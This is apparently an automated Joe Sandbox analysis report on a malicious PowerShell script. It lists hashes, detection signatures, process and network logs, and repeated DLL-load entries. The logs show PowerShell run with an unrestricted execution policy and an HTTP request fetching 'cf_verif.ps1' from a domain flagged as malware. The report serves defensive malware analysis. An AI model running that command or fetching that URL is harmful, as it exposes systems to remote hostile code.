Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0J5R54fzDJ.ps1

Overview

General Information

Sample name:0J5R54fzDJ.ps1
renamed because original name is a hash value
Original sample name:df2ffecdfecc6eec6cbb8f28d193257c99cf22a9204a95f2a6b7d4ca3504276d.ps1
Analysis ID:1631899
MD5:add1b58cd122ee7a1807d8634099b1f2
SHA1:0b9e55fdf1906c81f367afbcb8efac8a526e089c
SHA256:df2ffecdfecc6eec6cbb8f28d193257c99cf22a9204a95f2a6b7d4ca3504276d
Tags:cf-prod-cap--cfdps1user-JAMESWT_MHT
Infos:

Detection

Score:52
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Joe Sandbox ML detected suspicious sample
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • powershell.exe (PID: 7364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\0J5R54fzDJ.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • notepad.exe (PID: 7548 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\0J5R54fzDJ.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\0J5R54fzDJ.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\0J5R54fzDJ.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3780, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\0J5R54fzDJ.ps1", ProcessId: 7364, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\0J5R54fzDJ.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\0J5R54fzDJ.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3780, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\0J5R54fzDJ.ps1", ProcessId: 7364, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-07T17:07:50.123089+010018100002Potentially Bad Traffic192.168.2.449715188.114.96.3443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://cf-prod-cap.cfd/cf_verif.ps1Avira URL Cloud: Label: malware
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49715 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbH< source: powershell.exe, 00000001.00000002.1260378056.000000000706C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1260378056.000000000700E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdblity.pdb source: powershell.exe, 00000001.00000002.1251762020.0000000002AB8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb7L source: powershell.exe, 00000001.00000002.1260378056.000000000700E000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49715 -> 188.114.96.3:443
Source: global trafficHTTP traffic detected: GET /cf_verif.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cf-prod-cap.cfdConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /cf_verif.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cf-prod-cap.cfdConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: cf-prod-cap.cfd
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 16:07:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MYnizO9LjRiBxJSSZxIqvZ4YuGJhFued40D%2F0VAa3jz3D2StXUQnQ0Qudzyvfs%2BPjrlDLUbzGoPoomVaNbp3KFxG09gp%2Be%2FTDvq8I6G%2Bd2Mt1yVPh1vgsmEVHfgFv7UQsbI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cb5918bc3466fb-DFW
Source: powershell.exe, 00000001.00000002.1252372611.0000000004CC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cf-prod-cap.cfd
Source: powershell.exe, 00000001.00000002.1260978683.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000002.1256339197.0000000005999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1252372611.0000000004A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1260378056.000000000700E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1252372611.0000000004931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1252372611.0000000004A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1260378056.000000000700E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1252372611.0000000004931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1252372611.0000000004B4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cf-prod-cap.cfd
Source: powershell.exe, 00000001.00000002.1252372611.0000000004D1C000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2464007019.0000024574D97000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2463643916.0000009E22FF9000.00000004.00000010.00020000.00000000.sdmp, 0J5R54fzDJ.ps1String found in binary or memory: https://cf-prod-cap.cfd/cf_verif.ps1
Source: powershell.exe, 00000001.00000002.1256339197.0000000005999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1256339197.0000000005999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1256339197.0000000005999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1252372611.0000000004A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1260378056.000000000700E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1252372611.0000000004EA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1256339197.0000000005999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1252372611.0000000004CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1252372611.0000000004CE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000001.00000002.1252372611.0000000004CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49715 version: TLS 1.2
Source: classification engineClassification label: mal52.winPS1@3/5@1/1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxvqhttm.sdp.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\0J5R54fzDJ.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\0J5R54fzDJ.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbH< source: powershell.exe, 00000001.00000002.1260378056.000000000706C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1260378056.000000000700E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdblity.pdb source: powershell.exe, 00000001.00000002.1251762020.0000000002AB8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb7L source: powershell.exe, 00000001.00000002.1260378056.000000000700E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
